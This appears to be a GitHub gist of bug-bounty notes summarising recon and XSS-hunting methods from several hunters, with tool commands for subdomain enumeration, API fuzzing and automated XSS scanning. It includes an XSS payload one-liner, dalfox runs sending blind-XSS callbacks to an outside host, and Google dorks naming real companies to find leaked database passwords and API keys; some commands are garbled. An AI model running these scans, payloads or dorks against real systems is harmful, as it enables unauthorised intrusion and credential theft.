Skip to content

Instantly share code, notes, and snippets.

@ayadim

ayadim/hacker_methodologies.md (archived)

Forked from ruevaughn/hacker_methodologies.md (archived).md
Created October 16, 2022 19:43
Show Gist options
  • Save ayadim/ef6aec09b7ab2b6712331d7f6dd6dae8 to your computer and use it in GitHub Desktop.
Save ayadim/ef6aec09b7ab2b6712331d7f6dd6dae8 to your computer and use it in GitHub Desktop.
Download ZIP
Hacker Methodologies & Tools
Raw
hacker_methodologies.md (archived)
# The Top Hacker Methodologies & Tools Notes
By [Chase](https://www.chasejensen.com). [*](https://www.twitter.com/chasej)[*](https://www.github.com/ruevaughn)[*](https://www.linkedin.com/in/chasejensen1)
---
Hackers Notes
---
* [Jason Haddix](#1-jason-haddix)
* [Nehamsec](#2-nehamsec)
* [Tomnomnom](#3-tomnomnom)
* [InsiderPHD](#4-insiderphd)
* [Mayonnaise](#5-mayonnaise)
* [ZSeano](#6-zseano )
Tools/Tutorials/Other
---
* [Noisy-Hacker Automated XSS](#noisy-hacker-automated-xss-workflow)
* [Amass with Hacking Simplified](#amass-with-hacking-simplified)
* [Bug bounty recon Automation using bash | Automate your complete recon](#bugbounty-recon-automation-using-bash--automate-your-complete-recon--cyberuf) | @CyberUF
* [The Mass Hunt XSS Technique Bug Bounty Hunters don't want you to know](#the-mass-hunt-xss-technique-bug-bounty-hunters-dont-want-you-to-know)
* [Bugbounty Webinar - Recon,Live attacking, Tools ](#bug-bounty-webinar---recon-live-attacking-tools--live-bugbounty-hunting--secoceans) by Secoceans | #[@secoceans]()
* [Secoceans Introduction](facebook.com/secoceans)
* [BHIS | Hack for Show, Report For Dough: Part 2 w/ BB King (1-Hour)](https://www.youtube.com/watch?v=bJ4gJVXPAS0)
# Hackers -
## 1. Jason Haddix
[Methodology 1](youtube.com/watch?v=qme4rAD2mlM)
1. Crunchbase - get acquisitions. 2- Get a ASN for thr company. He uses [Hurricane Electric](bgp.he.net)
### Acquisitions
---
Metabigor 2-
## 2. Nehamsec
<https://github.com/fuzz-security?tab=repositories>
He sets up his ubuntu box using his [BBHT Repo](https://github.com/nahamsec/bbht)
> He runs Directory Brute forcing because everytime he finds a new host, automatically he runs directory brute forcing on it, just to make sure he finds all the juicy files and folders. He uses [Dirsearch](https://github.com/maurosoria/dirsearch) as [shown here](https://youtu.be/YhUiAH5SIqk?t=548)
```bash
python3 dirsearch.py -u www.hackerone.com -t 50 -e html
```
>
```bash
# /bin/crtsh
# Also found https://www.udemy.com/course/intro-to-bug-bounty-by-nahamsec/learn/lecture/24998100#overview 30 seconds in
# Manual
# Automated
curl -s https://crt.sh/\?q\=%25.$1\&output=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```
---
## 3. Tomnomnom
### Tomnomnom Methodology
[Live Recon and Automation on Shopify's Bug Bounty Program with @TomNomNom](https://www.youtube.com/watch?v=SYExiynPEKM)
### Assetfinder & wildcards file
He [gathers the wildcard](https://youtu.be/SYExiynPEKM?t=448) from their scope into `wildcards` then runs `assetfinder` then he goes and finds subdomains. `cat wildcards | assetfinnder --subs-only | anew domains`
> If your subdomains end up containing characters at the front of them like `-cisco.shopify.com`, [a nice low tech way](https://youtu.be/SYExiynPEKM?t=560) to clean them is to `sort` (:`sort` in Vim) and then pop to the end ( `G` in Vim) so any special characters will go down to the end (I suppose a reverse sort would make them at the beginning) making it easy to trim them out and get rid of any lines beginnig with a `*` and so on. He keeps the ones starting with `_` like `_dev.shopify.com`.
### Httprobe --prefer-https & hosts file
To find what's listening he uses [httprobe](https://github.com/tomnomnom/httprobe) with [a concurrency](https://youtu.be/SYExiynPEKM?t=586) of 80 'or something like that' Final command [here](https://youtu.be/SYExiynPEKM?t=642)`cat domains | httprobe -c 80 --prefer-https | anew hosts` he does that to see what respoods on port 443 or 80. He wrote into Httprobe the ability to [prefer-https](https://youtu.be/SYExiynPEKM?t=602) with the `--prefer-https` flasg.
### Anew
Previously before anew he would use `tee -a`. A common use case him is he has a [file of domains](https://youtu.be/SYExiynPEKM?t=683) and he didn't want to have to de-duplicate them all the time, so he created `anew`. He uses a few different tools to look for domains e.g. `assetfider`, `findomain`. `anew` only adds nenw lines to the file, it works works similar to `tee -a` except if a line already exists in a file, it doesn't add it. It also outputws [what the new lines were](https://youtu.be/SYExiynPEKM?t=705) so you know what it is adding to the file if thats where stdout is putting the output.x
> Starts [here](https://youtu.be/SYExiynPEKM?t=698)
`findomain -f wildcards | tee -a findomain.out` and then `cat findomain.out | anew domains | httprobe -c 50 | anew hosts`
If he was to Httprobe the output of `findomain` before ran anew on them against the domains file which ensures only non duplicate hosts will be displayed as output, then it would run httprobe for ALL of them raher on unique domains. A cool tip to keep the noise low. This highlights a problem with anew / this workflow in my opinion, if something happened (a typo in the command, commad recieved a error code response it can't handle, etc) then httprobe might not get ran and anew would cover up the problem on accident.
---
Another Tomnomnom video / tutorial: [TODO](#FIND!)
Move from one working thing to another working thing. Make small modification
<https://github.com/BlackFan/client-side-prototype-pollution>
### 2. InsiderPHD
---
Methodology Notes #1 - [Katie Explains - My Methodlogy](https://www.youtube.com/watch?v=5oUNvWwKPtI)
> She clicks all the buttons always. She prefers to understand every tool and have a precise reason and goal for usage.
> Did I mention Click ALL the buttons?
> Click all the buttons. Make sure you've tried good ol' press all the buttons.
## API Enumeration / Burp Intruder
> ## Copy & Paste into **Burp Intruder**
### Identify Interesting Endpoints - Learning to recognize interesting endpoits takes lots of time as a developer or lots of time hackinng. Rely on your intuition
> Things to look for - signs of interesting endpoints
>
> * ID = IDOR
> * Sequential? (ids?)
> * Reflected Input = XSS
> * Complex Processes = Busiess Logic
> * Lots of Data = Information Exposure
### Wordlists Public / API / Custom wordlists
API Wordlists - A wordlist of API Names used for fuzzing web application APIs.
When do we use wordlists? 2 main times in API recon specifically
>When we want to enumerate resources to find new endpoints
>When we want to enumerate paramters to find additional functionarlity
>Often this require 2 different Wordlists!
1. Public wordlists
---
1) Seclists (API Specific)
2) Fuzzdb (API Specific)
3) Seclists raft words (list of words)
2. Manual Wordlists
* Similar services might have documented APIS - check for those
* Or use the waybackmachine method on those API's (nehamsecs videos)
* Make sure you've tried good old press all the buttons
Then start writing sensible words
* What does the app say?
* What actions does it let you do?
```
/api/v1/profile
/api/v1/users
/api/v1/posts
/api/v1/answers
```
DEMO: Enumeration API Endpoints using ffuf and Burp Intruder
Scenario: Starting on a new webpage, we don't see much other than a login page. There is not much content to click on. Staring at you is a login. Finally, you check burp. You see `/api/users/6` in a BURP web request. [Let the fun begin!](https://github.com/danielmiessler/SecLists/tree/master/Discovery/-Content/api)
1. In burpsuite send an API request you want to fuzz to Intruder.
2. Remove the existing API function call and replace it with the two SS Characters for each text file you want to use
3. On the 'Positions' tab, set Attack type to 'Cluster Bomb'
4. On the Payloads tab, select 1 for the first payload set drop-dow then select a payload type of "Runtime file" and navigate to the driectory you downloaded these text files to, select "Actions.txt"
## 3. Mayonnaise
## 4. Jason Haddix
---
### (00) Project Tracking
---
Take notes with Xmind. He finds Acquisitionos with Crunchbase. The he finds ASN numbers for all acquisitions found manually with [bgp.he.net](https://bgp.he.net)
### (01) Finding Seeds/Roots
---
You can use [asnlookup] or [metabigor]
> ASN - The Autonomous System Number is a reference to their entire IP Space. A 'Reference Identifier' for all of their Registered Ips/IP Space. Collecting ASNs maually can be important so you don't accidently enumerate over an asset that is NOT in scope, or more in particular of a wrong target altogether.
> > Take for instance he searched for "Office" and it came up with Office Depot Europe B.V and Office Depot (as it should.) It also came up with "The Office of fhe President". Which... you probably don't want to be enumerating willy Nilly!
<u>**Amass**</u> - Run amass on the found ASNs `amass intel -asn 138603 -config $HOME/.config/amass/config.ini`
Whoxy - While Amass is running he runs the company through whoxy. You can get a free api key through Whoxy. There are many Reverse "Who Is" databases find the one you like.
Domlink - give it your api key and your domain and it will find everything for the 'company' and 'email' and all the related domains
He uses the search engine tool `Shodan` to glean a valuable question: is `twitch.amazon.eu` (Found prevously using ______) relevant to our testing? Example: `<https://www.shodan.io/search?query=twitch.tv>
---
## 5. ZSeano
### Zseano Methodology 1
[Live Recon on Rockstar Games With @zseano​](https://www.youtube.com/watch?v=8Sqp_kryB4E)
He created [bugbountyhunter.com](bugbountyhunter.com) Where he personally triages bugs you submit.
His Recon is "Figuring out how things work". He will be doing Recon on Rockstar Games. Before he does anythig he [reads writeups](https://hackerone.com/rockstargames/hacktivity?type=team). In the case of Rockstart Games he noticed a lot of [XSS](https://hackerone.com/reports/220852) and Open basic vulnerabilities. That says to him that he should just go checkout the webapp and [see how it works and log some requests](https://youtu.be/8Sqp_kryB4E?t=671).
---
### Zseano Methodology 2
[Zseanos Methodology Book](https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf)
* Don't learn to hack, hack to learn
* Sharing is caring
* Hackers question everything!
Inspirations: [@Yaworsk](https://twitter.com/yaworsk?lang=en), [@rohk_infosec](https://twitter.com/rohk_infosec) and [@ZephrFish](https://twitter.com/ZephrFish)
Search google.com, google.es etc. for terms like “responsible disclosure program”, “vulnerability disclosure program”, “vulnerability program rewards”, reward program”, inurl: vulnerability disclosure, inurl: responsible disclosureounty Programs
### Toolkit
===
Burp, Collaborator, bappstore
Amass, httprobe, aquatone, anew, dnsgen, ffuf
Seclists, Commonspeak, Inputscanner, Linkfinder, Parameth, Mhmdiaa, Anychange
Process for testing for XSS & filtering:
> Step One: Testing different encoding and checking for any weird behaviour
> Test `<h1><img><table>`
> |-> If it is reflected as &lt; or %3C then try for double encodings like %253C and %26lt;
> |( TIP ) => <https://d3adend.org/xss/ghettoBypass> Some interesting encodings to try can be
>
> This step is about finding out what's
> allowed and isn't & how they handle our payload. For example if `<script>` was
> reflected as &lt;script&gt;, but %26lt;script%26gt; was reflected as `<script>`, then I
> know I am onto a bypass and I can begin to understand how they are handling
> encodings (which will help me in later bugs maybe!). If not matter what you try you
> always see &lt;script&gt; or %3Cscript%3E then the paramerer in question may not
> be vulnerable.
### Issues he finds
He first Starts with XSS to get a feel for the overall security of the app. By testing the filters, you can see what parameters are filtered and what is let through. The interestinng thing about his methodology is you know the site is vulnerable, but the filters were put into place by the developers to stop you from exploting it. The thinking behind that is it means even i f the
* [Burp](Burp Suite | <https://support.portswigger.net>) - [Burp Collaborator](https://portswigger.net/burp/documentation/collaborator/deploying) | <https://portswigger.net/bappstore>
* DNSGen | If you want to be really thorough and possibly even find some gems, dnsgen by Patrik Hudak (<https://github.com/ProjectAnte/dnsgen>) works brilliantly: `cat amass-output.txt | dnsgen - | httprobe`
1
* ffuf | To discover files and directories, FFuF (<https://github.com/ffuf/ffuf>) is by far the
fastest and most customisable, it’s worth reading all the documentation, however for
basic usage: `ffuf -ac -v -u https://domain/FUZZ -w wordlist.txt.`
Wordlists – Every hacker needs a wordlist and luckily Daniel Miessler has provided
us with “SecLists” (<https://github.com/danielmiessler/SecLists/>) which contains
wordlists for every type of scanning you want to do. Grab a list and start scanning to
see what you can find. As you continue your hunting you'll soon realize that building
your own lists based on keywords found on the program can help aid you in your
hunting. The Pentester.io team released “CommonSpeak” which is also extremely
useful for generating new wordlists, found here:
<https://github.com/pentester-io/commonspeak>. A detailed post on using this tool can
be found at <https://pentester.io/commonspeak-bigquery-wordlists/>
RESOURCES
---
[Breaking into information security: Learning the ropes 101” by Andy Gill (@ZephrFish).](https://leanpub.com/ltr101-breaking-into-infosec)
## Noisy Hacker: Automated XSS Workflow
wd
> Summary: He uses a combination of Param Spider, GXSS, and Dalfox to enumerate the endpoints for params,
> Goal: Find Xss automatically while doing Bounty Hunting. Video [here](https://www.youtube.com/watch?v=6rkk3v2a7WQ)
> [testvuln.txt](https://youtu.be/6rkk3v2a7WQ?t=79)
#### [ParamSpider](https://youtu.be/6rkk3v2a7WQ?t=122)
```bash
python3 paramspider.py --domain testphp.vulnweb.com/ -o /root/Desktop/testvuln.txt
```
#### [Gxss](https://youtu.be/6rkk3v2a7WQ?t=107)
```bash
cat testvuln.txt | Gxss -p chocobo
```
#### [Dalfox](https://youtu.be/6rkk3v2a7WQ?t=146)
```bash
cat testvuln.txt | Gxss -hoco | dalfox pipe --mining-dict /root/Desktop/Useer/db/params.txt --skip-
```
### Cyber UF
---
#### Live XSS Using dalfox - Paramspider | Automation Tools, Bugbounty |By-PJBorah #cyberuf
> [Paramspider](https://youtu.be/zI7U7Z1u0Gc?t=193)
```bash
python3 paramspider.py --domain http://testphp.vulnhub.com -o myparam.txt
```
> Dalfox)(<https://youtu.be/zI7U7Z1u0Gc?t=355>)
```bash
dalfox file myparam.txt -b me2.xss.ht --proxy http://127.0.0.1:8080
```
>
>[Check Amass Config File](https://twitter.com/dokkillo/status/1305746397321363457)
```
amass enum -list -config config.ini
```
#### Amass with Hacking Simplified
Download the resolvers as see [here](#todo) and [here](#todo-jeff-foley)
He has passive and active commands for amass as seen [here](https://youtu.be/Pv4fGBZWyqY?t=697)
```bash
# Passive Recon
amass enum -passive -d hackerone.com -src -dir h1_amass -o output_h1.txt -rf 50-resolvers.txt
# Active Recon
amass enum -active -d hackerone.com -src -dir h1_amass -o output_h1.txt -rf 50-resolvers.txt
# Track
amass enum -track -config ~/HOME/.config/amass/config.ini -d hackerone.com -dir h1_amass
# Viz
amass viz -d3 -dir h1_amass
# Run Python Server
cd h1_amass && python3 -m http server
```
If runing on a domain with a lot of hosts run using the `screen` command.
#### Bugbounty recon Automation using bash | Automate your complete recon | @CyberUF
He walks us through setting up a short script (3-4 lines)
Here is the [basic outline](https://youtu.be/yxLDy-AuTog?t=259) wd:
File: **recon.sh**
```bash
#!/bin/bash
domain=$1
if [[ -z $domain ]];
then
echo -e "Usage ./recon.sh <domain>"
exit 1
fi
mkdir "$domain"
```
He then Enumereates over subdomains using `Subfinder`.
```bash
echo -e "Enumerating subdomains for "$1""
subfinder -d "$domain" -silent > " $domain"/subs.txt
```
You can [run it](https://youtu.be/yxLDy-AuTog?t=259) using `chmod u+x /path/to/recon.sh` and then calling it `./recon.sh google.com`.
Next he [gets all the live subdomains](https://youtu.be/yxLDy-AuTog?t=665) using [Httpx](https://github.com/projectdiscovery/httpx ).
```bash
echo -e "Enumerating Live Subs for "$1""
cat "$domain"/subs.txt | https -title -tech-detect -status-code > "$domain"/live-subs.txt
```
Next he gets all Urls for the target.
```bash
echo -e "Enumerating All Urls for "$1""
cat "$domain"/live-subs.txt | waybackurls > "$domain/All-urls.txt"
```
To test his script at this point he [comments out httpx](https://youtu.be/yxLDy-AuTog?t=1023) because it takes the longest to run out of the all.
This is he end of his Part 1. He is going to release the next part to this in a week which I will post the notes on here. [He Notes](https://youtu.be/yxLDy-AuTog?t=1140) how you can easily add onto this any of the subdomain enumeration tools like Shodan etc.
---
### [Xss Using Automation | s + grep | Bugbountytrick |By-PJBorah][https://www.youtube.com/watch?v=goclfp6a2IQ](#cyberTEACH[)](https://www.youtube.com/hashtag/cyberteach)
[Extract Parameters, Callbacks, Endpoint etc.](https://youtu.be/j7dAAXC9fQQ?t=133) Using echo . s and regex.
```bash
echo 'google.com' | s | grep "redirect="
echo 'google.com' | s | grep "url="
```
Enter Dalfox - as we know by now Dalfox is a great tool for hunting against XSS, and also SQLi, SSTI, and more.
```bash
echo 'https://google.com' | s | tee outputurls.txts
```
He has the next video which goes over dalfox
---
## The Mass Hunt XSS Technique Bug Bounty Hunters don't want you to know
[[Video](https://www.youtube.com/watch?v=FWtradkn3Vo)] by Hacktify Cyber Security
In a previous video he [came up](https://youtu.be/FWtradkn3Vo?t=122) with the following payload / oneliner:
```bash
waybackurls testphp.vulnweb.com | tee testphp1.txt | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><script>confirm(1)</script>' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \033[0;e31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
```
He [broke this video down](https://youtu.be/FWtradkn3Vo?t=107) into two parts.
1st part - as experienced xss hunters know, in order to find XSS, we need to find parameters. We have all paramters from `waybackurls` with the help of `gf` xss patterns / `grep "="` works as well to find them. Doing an `egrep -iv` clears the clutter. When we have the parameters, we just need to check if they reflect special characters.
1. ***Need to check special chars***
If special characters are ***not*** filtered, and they ***do*** reflect back into the response, we confirm the need to put an xss payload in it.
[After](https://youtu.be/FWtradkn3Vo?t=249) we have done this step, we are going to narrow down the scope from say 500 to 50 so we send less requests. So now that we have identified special parameters and narrowed our scope down, it's time to come up with a valid xss payload.
2. ***Valid xss Payload***
It will put dynamic xss payloads to this narrowed down scope, and *only* send a valid xss payload to those that are **not** filtering special parameters.
Essentially, we are [being nice to the server](https://youtu.be/FWtradkn3Vo?t=285) and not triggering the WAF.
> cat testphpwayback.txt --> read the file \
> | kxss --> filter special chars \
> | sed 's/=.*/=/' --> remove everythig after =, add = \
> | sed 's /URL: //' --> remove URL: and white space \
> | dalfox pipe --> dalfox tool for xss payload \
-b <https://me2.xss.ht> --> BXSS payload adder.
[Read](https://youtu.be/FWtradkn3Vo?t=316) the output of s
After Dalfox pass all urlss to Dalfox usin pipeline [mode](https://youtu.be/FWtradkn3Vo?t=766)
For submitting Markdown Reports, [Use](https://youtu.be/FWtradkn3Vo?t=1008) StackEdit
Blindxss [payloads](https://youtu.be/FWtradkn3Vo?t=1008)
### Bug Bounty Webinar - Recon, Live Attacking, Tools | Live Bugbounty Hunting | #SECOCEANS
---
Dec 12, 2020
Bugbounty Webinar - Recon,Live attacking, Tools | [Live Bugbounty hunting](https://www.youtube.com/watch?v=LHWPG0EJNeg) | #SECOCEA
You should know
Operating Systems
Html
CSS
Javascript
PHP
But if you don't know how to code that's ok.
6. Bash, Python ( A programming language)
Follow Nehamsec, Pentesterland, Hackactivity, Integrity blbsposgedi q
Information Gathering
---
What is:- Reconnaissance (Recon) is an imporant tenchinque for penetration testing and the beginnning point of many data breaches. It involves gathering of information about the target which can be useful for finding flaws or vulnerabilities. Many people never do proper reconnaissance and start attacking the targest which is a wrong way.
Step 1: Choose a Target. [He uses Google Dorking](https://youtu.be/LHWPG0EJNeg?t=1916) to find a program.
> responsible disclosure powered by bugcrowd
>
#### Tools To Gather Information
* [Subfinder](https://github.com/projectdiscovery/subfinder) => to find the Subdomains
* [Httpx](https://github.com/projectdiscovery/httpx)
* [Waybackurls](https://github.com/tomnomnom/waybackurls)
* `cat domains.txt | waybackurls > urls`
* Dalfox
[Subfinder Syntax](https://youtu.be/LHWPG0EJNeg?t=716)
> [Https](https://youtu.be/LHWPG0EJNeg?t=787)
##### Google Dorks
> [Google Dorking](https://youtu.be/LHWPG0EJNeg?t=1391) is justs an advanced technique that is used to search Google's index in a better way. Using this technique you can do a lot of things. You can search for a very specific query or find someone's email and even passwords.
Next he highlights some powerful dorks.
**Dork** [#1:](https://youtu.be/LHWPG0EJNeg?t=1493)
```ruby
inurl:circonuss.com intitle: "index of"
```
**Dork** [#2:](https://youtu.be/LHWPG0EJNeg?t=1523) To find out Database Password
```ruby
inurl:nokia.com filetype:env "DB_PASSWORD"
```
**Dork** [#3:](https://youtu.be/LHWPG0EJNeg?t=1762) To find Registration Pages
```ruby
site:oanda.com inurl:signup | inurl:register
```
**Dork** [#4:](https://youtu.be/LHWPG0EJNeg?t=1959) Find exposed Configuration Files - find information exposure
```ruby
site:better.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini | ext:env | ext:log
```
#### GitHub Dorking
Starts [here](https://youtu.be/LHWPG0EJNeg?t=2589) there is a repo starting[here](https://github.com/techgaun/github-dorks) that has [a list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)
Search [here](https://github.com/search#search_cheatsheet_pane)
```ruby
site:outreach.io "Api_key"
```
### end [here](https://youtu.be/LHWPG0EJNeg?t=2730)
---
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment